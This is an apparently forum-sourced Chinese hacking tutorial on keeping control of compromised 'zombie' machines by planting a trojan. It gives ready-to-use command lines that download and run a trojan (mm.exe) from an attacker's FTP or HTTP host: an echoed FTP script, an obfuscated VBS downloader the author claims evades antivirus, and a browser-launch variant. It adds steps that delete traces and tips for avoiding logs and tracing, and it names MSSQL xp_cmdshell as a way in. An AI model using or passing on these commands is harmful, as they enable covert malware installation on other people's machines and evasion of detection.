下文说一下搞定了肉鸡,如何保持长久上线,防止动态ip或者域名变化导致找不到肉鸡。
这需要种植木马,且这个木马要能够往外面咱们自己的服务器或者邮箱等报告自己的运行状态。
如何下载木马并种植到肉鸡上面的问题,其实网上也有零散的,
我这儿算是整理,同时加上自己的体会。大家还是多实践,多搞搞肉鸡
(最好练习命令行,3389登陆上去一对记录,如被追踪很危险的。
其实我更相信,图形界面下能操作的,命令行都能操作
正如windows下能搞的,linux下都能做到)
这儿命令行可以是ms sql1433得到的xp_cmdshell等。
木马下载无非是ftp跟http的网页下载两种方式,这儿分别介绍:
1.ftp下载
这儿是使用肉鸡system32目录下的ftp.exe来访问我们放置木马的ftp服务。
显然要解决输入帐号密码的问题,同时要制定命令让远程的ftp.exe执行,
从而下载文件。还好,这些都可以通过命令来解决。
假设木马文件在服务器ftpxx.3322.org下,帐号为ftpxx,密码为3322,文件为mm.exe。
通过命令行
===========================
echo ftpxxx>ftp.txt
echo 3322>>ftp.txt
echo get mm.exe>>ftp.txt
echo bye>>ftp.txt
ftp -s:ftp.txt ftpxx.3322.org
===========================
则根据前一篇文章的&用法,也可以用一句命令完成:
echo ftpxxx>ftp.txt & echo 3322>>ftp.txt & echo get mm.exe>>ftp.txt & echo bye>>ftp.txt & ftp -s:ftp.txt ftpxx.3322.org
这样就下载成功了。
下一步是执行木马并删除记录:
也就是一句话(三个语句):
mm.exe & del ftp.txt & del mm.exe
2.html下载
这儿是使用肉鸡system32目录下的wscript.exe来执行指定的vbs脚本访问我们放置木马的http服务器。
假设木马地址为:http://ftpxx.3322.org/mm.exe mm.exe
通过命令行(无需任何修改,我已做免杀,除非被杀了,可以修改脚本)
==========================
@echo with wscript:if .arguments.count^<2-0+0-0+0 then .quit:end if > thisis.vbs
@echo set aso=.createobject("adodb.stream"):set thisisweb=createobject("mi"+"cr"+"o"+"s"+"o"+"ft.x"+"ml"+"h"+"ttp") >> thisis.vbs
@echo thisisweb.open "g"+"e"+"t",.arguments(0),0:thisisweb.send:if thisisweb.status^>200 then .echo "E"+"r"+"r"+"o"+"r"+":"+thisisweb.status:.quit>> thisis.vbs
@echo aso.type=1-0+0-0+0:aso.open:aso.write thisisweb.responsebody:aso.savetofile .arguments(1-0+0-0+0),2-0+0-0+0:end with >> thisis.vbs
Type thisis.vbs
=============================
下一步是执行木马并删除记录:
也就是一句话(三个语句):
cscript thisis.vbs http://ftpxx.3322.org/mm.exe mm.exe & del thisis.vbs & del mm.exe
或者简单的方法是(会弹出网页!):
START its:http://ftpxx.3322.org/mm.exe
下载后,
DIR /A /S "C:Documents and SettingsDefault UserLocal SettingsTemporary Internet FilesContent.IE5*.EXE"
列出路径后,执行。
这儿帐号Default User也可能是当前用户
登陆您的帐号 | 免费注册帐号